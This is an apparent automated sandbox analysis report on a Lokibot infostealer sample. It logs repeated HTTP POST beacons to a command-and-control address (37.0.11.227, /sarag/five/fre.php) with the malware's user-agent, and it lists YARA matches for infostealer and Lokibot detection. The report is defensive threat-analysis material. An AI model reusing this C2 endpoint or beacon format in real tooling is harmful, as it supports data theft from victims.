              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 196Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 196Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: global trafficHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 169Connection: close
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: unknownTCP traffic detected without corresponding DNS query: 37.0.11.227
              Source: vNcHHC1HKe.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: dtlrkp.exe, dtlrkp.exe, 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dtlrkp.exe, 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: unknownHTTP traffic detected: POST /sarag/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 37.0.11.227Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 4E024674Content-Length: 196Connection: close
              Source: C:\Users\user\AppData\Local\Temp\dtlrkp.exeCode function: 3_2_00404ED4 recv,
              Source: C:\Users\user\Desktop\vNcHHC1HKe.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

              System Summary

              barindex
              Source: 3.0.dtlrkp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.0.dtlrkp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.0.dtlrkp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.dtlrkp.exe.8b0000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.dtlrkp.exe.8b0000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.2.dtlrkp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.2.dtlrkp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.2.dtlrkp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.0.dtlrkp.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.0.dtlrkp.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.0.dtlrkp.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.0.dtlrkp.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.0.dtlrkp.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.0.dtlrkp.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.0.dtlrkp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.0.dtlrkp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.0.dtlrkp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.0.dtlrkp.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.0.dtlrkp.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.0.dtlrkp.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.0.dtlrkp.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.0.dtlrkp.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.0.dtlrkp.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.dtlrkp.exe.8b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 1.2.dtlrkp.exe.8b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 1.2.dtlrkp.exe.8b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.2.dtlrkp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.2.dtlrkp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.2.dtlrkp.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.0.dtlrkp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.0.dtlrkp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.0.dtlrkp.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.0.dtlrkp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.0.dtlrkp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.0.dtlrkp.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.0.dtlrkp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.0.dtlrkp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.0.dtlrkp.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 3.0.dtlrkp.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 3.0.dtlrkp.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 3.0.dtlrkp.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000003.00000000.370974259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000003.00000002.626023064.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000003.00000000.374794623.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000003.00000000.376619815.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000002.379285097.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000003.00000000.378317915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: vNcHHC1HKe.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 3.0.dtlrkp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.0.dtlrkp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.0.dtlrkp.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.dtlrkp.exe.8b0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.dtlrkp.exe.8b0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.2.dtlrkp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.2.dtlrkp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.2.dtlrkp.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.0.dtlrkp.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.0.dtlrkp.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.0.dtlrkp.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.0.dtlrkp.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.0.dtlrkp.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.0.dtlrkp.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.0.dtlrkp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.0.dtlrkp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 3.0.dtlrkp.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 3.0.dtlrkp.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 3.0.dtlrkp.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
